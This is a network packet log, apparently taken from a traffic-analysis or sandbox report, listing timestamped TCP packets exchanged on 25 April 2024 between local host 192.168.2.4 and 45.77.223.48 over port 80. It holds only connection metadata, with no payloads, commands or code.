Apr 25, 2024 09:42:37.267024040 CEST	80	49779	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:37.267031908 CEST	49779	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:37.267060041 CEST	49779	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:37.271701097 CEST	49780	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:37.402981997 CEST	80	49780	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:37.403105021 CEST	49780	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:37.405097961 CEST	49780	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:37.535967112 CEST	80	49780	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:37.536058903 CEST	49780	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:37.666896105 CEST	80	49780	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:38.365076065 CEST	80	49780	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:38.365109921 CEST	80	49780	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:38.365163088 CEST	80	49780	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:38.365220070 CEST	80	49780	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:38.365225077 CEST	49780	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:38.365289927 CEST	49780	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:38.365432024 CEST	49780	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:38.365544081 CEST	80	49780	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:38.365612984 CEST	49780	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:38.374820948 CEST	80	49780	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:38.374867916 CEST	49780	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:38.375261068 CEST	80	49780	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:38.375319958 CEST	49780	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:38.375334978 CEST	80	49780	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:38.375377893 CEST	49780	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:38.375531912 CEST	80	49780	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:38.375572920 CEST	49780	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:38.375683069 CEST	80	49780	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:38.375724077 CEST	49780	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:38.496934891 CEST	80	49780	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:38.496948957 CEST	80	49780	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:38.496982098 CEST	49780	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:38.497005939 CEST	49780	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:38.511616945 CEST	49781	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:38.641058922 CEST	80	49781	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:38.641144037 CEST	49781	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:38.643234968 CEST	49781	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:38.772552013 CEST	80	49781	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:38.772644997 CEST	49781	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:38.901983023 CEST	80	49781	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:39.630266905 CEST	80	49781	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:39.630357027 CEST	80	49781	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:39.630422115 CEST	49781	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:39.630479097 CEST	49781	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:39.630510092 CEST	80	49781	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:39.630574942 CEST	49781	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:39.639353037 CEST	80	49781	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:39.639417887 CEST	49781	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:39.639588118 CEST	80	49781	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:39.639626980 CEST	49781	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:39.639868975 CEST	80	49781	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:39.639905930 CEST	49781	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:39.639964104 CEST	80	49781	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:39.640001059 CEST	49781	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:39.640228987 CEST	80	49781	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:39.640244007 CEST	80	49781	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:39.640264034 CEST	49781	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:39.640268087 CEST	80	49781	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:39.640285969 CEST	49781	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:39.640300035 CEST	49781	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:39.760143042 CEST	80	49781	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:39.760159016 CEST	80	49781	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:39.760210991 CEST	49781	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:39.788732052 CEST	49782	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:39.920078039 CEST	80	49782	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:39.920201063 CEST	49782	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:39.921948910 CEST	49782	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:40.056221008 CEST	80	49782	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:40.056274891 CEST	49782	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:40.187674999 CEST	80	49782	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:40.912035942 CEST	80	49782	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:40.912065983 CEST	80	49782	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:40.912206888 CEST	49782	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:40.912219048 CEST	80	49782	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:40.912332058 CEST	49782	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:40.921699047 CEST	80	49782	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:40.921777964 CEST	49782	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:40.922399998 CEST	80	49782	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:40.922442913 CEST	49782	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:40.922539949 CEST	80	49782	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:40.922589064 CEST	49782	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:40.922666073 CEST	80	49782	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:40.922707081 CEST	49782	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:40.923187971 CEST	80	49782	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:40.923228979 CEST	49782	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:40.923249960 CEST	80	49782	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:40.923291922 CEST	49782	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:40.923321009 CEST	80	49782	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:40.923360109 CEST	49782	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:41.043621063 CEST	80	49782	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:41.043673992 CEST	49782	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:41.043756962 CEST	80	49782	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:41.043800116 CEST	49782	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:41.059283018 CEST	49783	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:41.190566063 CEST	80	49783	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:41.190665960 CEST	49783	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:41.192421913 CEST	49783	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:41.322335005 CEST	80	49783	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:41.322518110 CEST	49783	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:41.453006029 CEST	80	49783	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:42.184628010 CEST	80	49783	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:42.184706926 CEST	80	49783	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:42.184789896 CEST	49783	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:42.186400890 CEST	49783	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:42.194593906 CEST	80	49783	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:42.194669008 CEST	49783	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:42.195008039 CEST	80	49783	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:42.195056915 CEST	49783	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:42.195261955 CEST	80	49783	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:42.195312977 CEST	49783	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:42.195393085 CEST	80	49783	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:42.195444107 CEST	49783	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:42.195482969 CEST	80	49783	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:42.195533037 CEST	49783	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:42.195574045 CEST	80	49783	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:42.195622921 CEST	49783	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:42.195687056 CEST	80	49783	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:42.195718050 CEST	80	49783	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:42.195730925 CEST	49783	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:42.195760012 CEST	49783	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:42.315084934 CEST	80	49783	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:42.315104008 CEST	80	49783	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:42.315148115 CEST	49783	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:42.315186977 CEST	49783	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:42.322634935 CEST	49784	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:42.449872017 CEST	80	49784	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:42.449986935 CEST	49784	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:42.452934980 CEST	49784	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:42.580503941 CEST	80	49784	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:42.580739021 CEST	49784	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:42.707938910 CEST	80	49784	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:43.494532108 CEST	80	49784	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:43.494645119 CEST	80	49784	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:43.494657993 CEST	49784	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:43.494738102 CEST	49784	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:43.494771004 CEST	80	49784	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:43.494827986 CEST	49784	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:43.513849974 CEST	80	49784	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:43.513901949 CEST	49784	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:43.514064074 CEST	80	49784	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:43.514111042 CEST	49784	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:43.514203072 CEST	80	49784	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:43.514254093 CEST	49784	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:43.514353991 CEST	80	49784	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:43.514395952 CEST	49784	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:43.514488935 CEST	80	49784	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:43.514532089 CEST	80	49784	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:43.514534950 CEST	49784	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:43.514569044 CEST	49784	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:43.514616966 CEST	80	49784	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:43.514667988 CEST	49784	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:43.622010946 CEST	80	49784	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:43.622097969 CEST	49784	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:43.622180939 CEST	80	49784	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:43.622194052 CEST	80	49784	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:43.622235060 CEST	49784	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:43.689141989 CEST	49785	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:43.814958096 CEST	80	49785	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:43.815052032 CEST	49785	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:43.818012953 CEST	49785	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:43.943686962 CEST	80	49785	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:43.943766117 CEST	49785	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:44.069502115 CEST	80	49785	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:44.759720087 CEST	80	49785	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:44.760068893 CEST	80	49785	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:44.760143995 CEST	49785	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:44.764193058 CEST	49785	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:44.768596888 CEST	80	49785	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:44.768667936 CEST	49785	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:44.769366980 CEST	80	49785	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:44.769442081 CEST	49785	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:44.769484997 CEST	80	49785	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:44.769496918 CEST	80	49785	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:44.769531012 CEST	80	49785	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:44.769536018 CEST	49785	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:44.769562006 CEST	49785	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:44.769593000 CEST	80	49785	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:44.769602060 CEST	49785	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:44.769607067 CEST	80	49785	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:44.769619942 CEST	80	49785	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:44.769644022 CEST	49785	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:44.769680977 CEST	49785	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:44.771863937 CEST	49785	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:44.885852098 CEST	80	49785	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:44.885905981 CEST	80	49785	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:44.885970116 CEST	49785	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:44.885970116 CEST	49785	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:45.720413923 CEST	49786	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:45.847734928 CEST	80	49786	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:45.847815990 CEST	49786	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:45.849787951 CEST	49786	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:45.976738930 CEST	80	49786	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:45.976818085 CEST	49786	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:46.104834080 CEST	80	49786	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:46.794424057 CEST	80	49786	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:46.794595957 CEST	80	49786	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:46.794604063 CEST	49786	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:46.794606924 CEST	80	49786	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:46.794692039 CEST	49786	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:46.794719934 CEST	49786	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:46.803699970 CEST	80	49786	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:46.803750992 CEST	49786	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:46.804141045 CEST	80	49786	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:46.804174900 CEST	80	49786	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:46.804184914 CEST	49786	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:46.804215908 CEST	49786	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:46.804351091 CEST	80	49786	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:46.804390907 CEST	49786	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:46.804529905 CEST	80	49786	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:46.804586887 CEST	49786	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:46.804586887 CEST	80	49786	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:46.804625988 CEST	49786	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:46.805231094 CEST	80	49786	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:46.805296898 CEST	49786	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:46.921797037 CEST	80	49786	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:46.921884060 CEST	49786	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:46.921964884 CEST	80	49786	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:46.921977997 CEST	80	49786	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:46.922099113 CEST	49786	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:46.922099113 CEST	49786	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:47.081834078 CEST	49787	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:47.216871023 CEST	80	49787	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:47.216973066 CEST	49787	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:47.218743086 CEST	49787	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:47.348016024 CEST	80	49787	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:47.348155022 CEST	49787	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:47.477463961 CEST	80	49787	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:48.176254034 CEST	80	49787	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:48.176371098 CEST	80	49787	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:48.176481962 CEST	49787	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:48.176578045 CEST	49787	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:48.177015066 CEST	80	49787	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:48.177093029 CEST	49787	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:48.185930967 CEST	80	49787	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:48.185944080 CEST	80	49787	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:48.186022043 CEST	49787	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:48.186058044 CEST	49787	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:48.186106920 CEST	80	49787	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:48.186180115 CEST	49787	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:48.186201096 CEST	80	49787	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:48.186224937 CEST	80	49787	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:48.186269045 CEST	49787	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:48.186322927 CEST	49787	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:48.186350107 CEST	80	49787	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:48.186423063 CEST	80	49787	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:48.186431885 CEST	49787	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:48.186495066 CEST	49787	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:48.305959940 CEST	80	49787	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:48.305982113 CEST	80	49787	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:48.306051970 CEST	49787	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:48.326807976 CEST	49788	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:48.457987070 CEST	80	49788	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:48.458184004 CEST	49788	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:48.461123943 CEST	49788	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:48.592523098 CEST	80	49788	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:48.592617989 CEST	49788	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:48.723737955 CEST	80	49788	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:49.394450903 CEST	80	49788	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:49.394527912 CEST	49788	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:49.394601107 CEST	80	49788	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:49.394612074 CEST	80	49788	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:49.394640923 CEST	49788	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:49.394664049 CEST	49788	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:49.402648926 CEST	80	49788	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:49.402699947 CEST	49788	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:49.403395891 CEST	80	49788	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:49.403444052 CEST	49788	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:49.403462887 CEST	80	49788	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:49.403497934 CEST	49788	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:49.403629065 CEST	80	49788	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:49.403667927 CEST	49788	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:49.403682947 CEST	80	49788	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:49.403714895 CEST	49788	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:49.403737068 CEST	80	49788	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:49.403780937 CEST	49788	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:49.403791904 CEST	80	49788	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:49.403829098 CEST	49788	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:49.525753975 CEST	80	49788	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:49.525803089 CEST	49788	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:49.525837898 CEST	80	49788	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:49.525875092 CEST	49788	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:49.525885105 CEST	80	49788	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:49.525917053 CEST	49788	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:49.548899889 CEST	49789	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:49.678392887 CEST	80	49789	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:49.678518057 CEST	49789	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:49.681958914 CEST	49789	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:49.811281919 CEST	80	49789	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:49.811392069 CEST	49789	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:49.941085100 CEST	80	49789	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:50.652350903 CEST	80	49789	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:50.652452946 CEST	49789	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:50.652472973 CEST	80	49789	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:50.652523041 CEST	49789	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:50.652546883 CEST	80	49789	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:50.652594090 CEST	49789	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:50.661850929 CEST	80	49789	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:50.661920071 CEST	49789	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:50.662633896 CEST	80	49789	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:50.662679911 CEST	49789	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:50.662764072 CEST	80	49789	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:50.662807941 CEST	49789	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:50.662924051 CEST	80	49789	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:50.662957907 CEST	80	49789	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:50.662971020 CEST	49789	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:50.663002014 CEST	49789	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:50.663157940 CEST	80	49789	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:50.663171053 CEST	80	49789	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:50.663213968 CEST	49789	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:50.781816959 CEST	80	49789	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:50.781867027 CEST	49789	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:50.782010078 CEST	80	49789	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:50.782023907 CEST	80	49789	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:50.782047033 CEST	49789	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:50.782066107 CEST	49789	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:50.787420034 CEST	49791	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:50.918509007 CEST	80	49791	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:50.918601036 CEST	49791	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:50.920365095 CEST	49791	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:51.051417112 CEST	80	49791	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:51.051470041 CEST	49791	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:51.182555914 CEST	80	49791	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:51.893538952 CEST	80	49791	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:51.893655062 CEST	49791	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:51.893675089 CEST	80	49791	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:51.893727064 CEST	49791	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:51.893755913 CEST	80	49791	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:51.893796921 CEST	49791	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:51.901823044 CEST	80	49791	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:51.901865959 CEST	49791	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:51.902108908 CEST	80	49791	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:51.902144909 CEST	49791	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:51.902261019 CEST	80	49791	45.77.223.48	192.168.2.4
